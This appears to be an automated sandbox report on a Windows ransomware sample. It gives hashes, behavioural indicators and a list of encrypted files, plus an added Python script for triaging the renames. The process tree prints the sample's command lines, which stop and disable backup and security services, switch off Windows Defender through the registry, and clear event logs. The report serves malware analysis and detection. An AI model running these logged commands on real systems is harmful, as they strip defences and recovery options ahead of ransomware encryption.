Analysis
max time kernel: 13s
max time network: 141s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-03-2024 15:04

Static task: static1
Behavioral task: behavioral1
  Sample: 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
  Resource: win10v2004-20240226-en
General
Target: 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
Size: 3.4MB
MD5: 3e3c64d90fb826c80e45d9f8791f76fe
SHA1: c7c893ef8d3550c773b3523f7c35a827cb65cc5f
SHA256: de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf
SHA512: ad2cc2abe25800e09c2c34a8943fc5698f28b59e59fb3d89c1993666a75cec42d119bc858c4fdc5114c5ad7b2416e1479811e3047a47c679d72360a536299115
SSDEEP: 49152:i2cDtPjVrb/TVvO90dL3BmAFd4A64nsfJurbOysDrVyOYF1w86FmCKenPr8bg11I:i2yj7nO7Dpy/Zi4JJOgQ
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings 10 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe

Modifies security service 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe

Clears Windows event logs 1 TTPs 3 IoCs
pid | Process
4252 | wevtutil.exe
1544 | wevtutil.exe
3572 | wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid | Process
2052 | bcdedit.exe
4392 | bcdedit.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials.
Drops file in Program Files directory 64 IoCs
description: File opened for modification (every row); Process: 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe (every row)
ioc:
- C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsStoreLogo.scale-200.png
- C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_altform-unplated_contrast-black.png
- C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosLogoExtensions.targetsize-32.png
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-black_scale-125.png
- C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml
- C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\sending.gif
- C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-24_altform-fullcolor.png
- C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\ImmersiveControl_Slider_Click_Sound.wma
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_nxAKc6E0Hlg0.mhkwl
- C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ppd.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_tMKTnOTamY00.mhkwl
- C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\localhost.crt
- C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-200_contrast-white.png
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml
- C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\27.jpg
- C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1
- C:\Program Files\GetRegister.wvx.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_JWD5nZAn6q40.mhkwl
- C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-400.png
- C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookLargeTile.scale-150.png
- C:\Program Files\Java\jre-1.8\lib\images\cursors\invalid32x32.gif.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_UQQDTzkhlBs0.mhkwl
- C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ul-oob.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_BiPInamDEDE0.mhkwl
- C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-16_contrast-white.png
- C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_altform-unplated_contrast-black.png
- C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FilePdf32x32.png
- C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleAppStoreLogo.scale-125.png
- C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\6px.png
- C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Square71x71Logo.scale-100.png
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-125.png
- C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_9UBs8-BaWE00.mhkwl
- C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@3x.png.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_a6mZCMSfHi40.mhkwl
- C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.boot.tree.dat.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_X_t_x29gf3o0.mhkwl
- C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui
- C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\WideLogo.scale-100_contrast-white.png
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailBadge.scale-150.png
- C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_dpX0rji4pmI0.mhkwl
- C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_8DwBqLx4tv80.mhkwl
- C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare71x71Logo.scale-200_contrast-white.png
- C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-phn.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_LLYR0tAChR80.mhkwl
- C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_R9alouYbacM0.mhkwl
- C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-96_altform-lightunplated.png
- C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_yVxrBJ3pWdA0.mhkwl
- C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Riblet.eftx.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_6c62Z6QI2MY0.mhkwl
- C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Grace-ul-oob.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_vYVARZKsdcY0.mhkwl
- C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\Movie-TVStoreLogo.scale-200_contrast-black.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_nXMV04FlsIA0.mhkwl
- C:\Program Files\Java\jre-1.8\legal\javafx\glib.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_uKqn5BaA6H40.mhkwl
- C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.winmd
- C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-256_altform-unplated.png
- C:\Program Files\Microsoft Office\root\Office16\MSIPC\id\msipc.dll.mui.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX__23V3zO5BhA0.mhkwl
- C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_contrast-white.png
- C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-30_altform-lightunplated.png
- C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageLargeTile.scale-200.png
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailWideTile.scale-125.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_radio_unselected_18.svg.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_5a2Njmj9uS00.mhkwl
- C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\30.jpg
- C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80_altform-unplated.png
- C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-100.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_mBoVvqUE_E40.mhkwl
- C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_R0kGwNVHzrA0.mhkwl
- C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ppd.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_0Sdz74xW1ow0.mhkwl
- C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\AppxSignature.p7x
- C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_altform-unplated_contrast-black.png
- C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_b0njiReWfLw0.mhkwl
- C:\Program Files\Java\jdk-1.8\legal\javafx\jpeg_fx.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_Fs5rwrqtE2M0.mhkwl
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageStoreLogo.scale-125_contrast-black.png
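The file list above mixes two kinds of rows: files that were renamed to `<original name>.<43-character token>_<12-character token>.mhkwl`, and files that were only opened for modification with their names intact (mostly under `C:\Program Files\WindowsApps`; the sandbox records the open, not whether the write succeeded). The script below is an added triage example for this report, not part of the sandbox output. It reads the naming pattern off the paths on this page, separates renamed from merely-opened files, recovers the original names and checks whether the 43-character token is constant across the run. Reading that token as a per-victim or per-campaign identifier and the 12-character one as a per-file tag is an inference from these paths, not something the report states. The sample input is a handful of paths copied from the list above.

```python
"""Triage a sandbox "opened for modification" file list for ransomware renames.

Added example for this report; it is not part of the sandbox output. The
naming pattern is read directly off the paths listed above. Treating the
43-character token as a per-victim/campaign id and the 12-character one as a
per-file tag is an inference from those paths, not something the report states.
"""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Every renamed file above has the shape
#   <original path>.<43 chars>_<12 chars>.mhkwl
# Both tokens only use the base64url alphabet, hence [A-Za-z0-9_-]. The fixed
# lengths matter: the second token may itself start with "_" (see msipc.dll.mui).
RENAMED = re.compile(
    r"^(?P<original>.+)\.(?P<id>[A-Za-z0-9_-]{43})_(?P<tag>[A-Za-z0-9_-]{12})\.mhkwl$"
)

# Constructed sample: seven paths copied from the list above.
SAMPLE_PATHS = [
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_nxAKc6E0Hlg0.mhkwl",
    r"C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ppd.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_tMKTnOTamY00.mhkwl",
    r"C:\Program Files\Microsoft Office\root\Office16\MSIPC\id\msipc.dll.mui.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX__23V3zO5BhA0.mhkwl",
    r"C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_R0kGwNVHzrA0.mhkwl",
    r"C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsStoreLogo.scale-200.png",
    r"C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1",
    r"C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui",
]


def parse(path):
    """Return {'original', 'id', 'tag'} for a renamed file, or None otherwise."""
    m = RENAMED.match(path)
    return m.groupdict() if m else None


def triage(paths):
    """Split paths into renamed vs. merely opened files and summarise both."""
    renamed, opened_only = [], []
    for p in paths:
        info = parse(p)
        if info:
            renamed.append(info)
        else:
            opened_only.append(p)
    return {
        "renamed": renamed,
        "opened_only": opened_only,
        # Distinct 43-char tokens. One value across all files means a single
        # id stamped on the whole run rather than per-file randomness.
        "ids": Counter(r["id"] for r in renamed),
        # Original extensions, i.e. what the sample actually bothered to rename.
        "original_exts": Counter(PureWindowsPath(r["original"]).suffix for r in renamed),
        # Top two path components, to see which product trees were touched.
        "dirs": Counter("\\".join(PureWindowsPath(p).parts[1:3]) for p in paths),
    }


def constant_token(paths):
    """Return the shared 43-char token if every renamed file carries the same one."""
    ids = triage(paths)["ids"]
    return next(iter(ids)) if len(ids) == 1 else None


if __name__ == "__main__":
    summary = triage(SAMPLE_PATHS)
    print(f"renamed: {len(summary['renamed'])}, opened only: {len(summary['opened_only'])}")
    print("shared token:", constant_token(SAMPLE_PATHS))
    for r in summary["renamed"]:
        print(f"  {r['tag']}  <- {r['original']}")
    print("original extensions:", dict(summary["original_exts"]))
    print("directories touched:", dict(summary["dirs"]))
```

Run against the full 64-row list, the same code yields the appended extension (`.mhkwl`) and the constant token as hunt indicators, and the recovered original names tell you which product trees (Office licences, Java, Acrobat, VLC) were actually encrypted versus only touched. Note that the regex is deliberately strict about the two token lengths; a looser `.*\.mhkwl$` would mis-split names such as `msipc.dll.mui` whose per-file tag begins with an underscore.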
Launches sc.exe 8 IoCs
sc.exe is the Windows utility for controlling services on the system.
pid | Process
4352 | sc.exe
4720 | sc.exe
752 | sc.exe
2604 | sc.exe
3848 | sc.exe
3888 | sc.exe
4780 | sc.exe
2828 | sc.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
3964 | vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs
pid | Process
228 | powershell.exe
228 | powershell.exe
1956 | powershell.exe
1956 | powershell.exe
1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
Tokens enabled, grouped by process (pid):
wevtutil.exe (4252): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (1544): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (3572): SeSecurityPrivilege, SeBackupPrivilege
wmic.exe (1872): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
wmic.exe (2960): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
wmic.exe (2960), second batch: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (each row below was recorded twice)
PID 1668 wrote to memory of 5076 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 86
PID 5076 wrote to memory of 836 | 5076 | net.exe | 89
PID 1668 wrote to memory of 1676 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 90
PID 1676 wrote to memory of 4224 | 1676 | net.exe | 92
PID 1668 wrote to memory of 1536 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 93
PID 1536 wrote to memory of 1844 | 1536 | net.exe | 96
PID 1668 wrote to memory of 4912 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 97
PID 4912 wrote to memory of 4964 | 4912 | net.exe | 100
PID 1668 wrote to memory of 4164 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 101
PID 4164 wrote to memory of 3060 | 4164 | net.exe | 103
PID 1668 wrote to memory of 3852 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 104
PID 3852 wrote to memory of 3064 | 3852 | net.exe | 106
PID 1668 wrote to memory of 2928 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 107
PID 2928 wrote to memory of 5012 | 2928 | net.exe | 109
PID 1668 wrote to memory of 3356 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 110
PID 3356 wrote to memory of 3496 | 3356 | net.exe | 112
PID 1668 wrote to memory of 3888 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 113
PID 1668 wrote to memory of 4780 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 115
PID 1668 wrote to memory of 2828 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 117
PID 1668 wrote to memory of 4352 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 119
PID 1668 wrote to memory of 4720 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 121
PID 1668 wrote to memory of 752 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 123
PID 1668 wrote to memory of 2604 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 125
PID 1668 wrote to memory of 3848 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 127
PID 1668 wrote to memory of 2320 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 129
PID 1668 wrote to memory of 1808 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 131
PID 1668 wrote to memory of 3272 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 133
PID 1668 wrote to memory of 4424 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 135
PID 1668 wrote to memory of 1944 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 137
PID 1668 wrote to memory of 2304 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 139
PID 1668 wrote to memory of 3476 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 141
PID 1668 wrote to memory of 1140 | 1668 | 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe | 143

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:836
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4224
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1844
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4964
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3060
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3064
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:5012
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_2cb1f" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_2cb1f" /y3⤵PID:3496
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:3888
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:4780
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:4352
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:752
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:2604
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_2cb1f" start= disabled2⤵
- Launches sc.exe
PID:3848
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2320
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1808
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3272
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4424
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1944
-
-
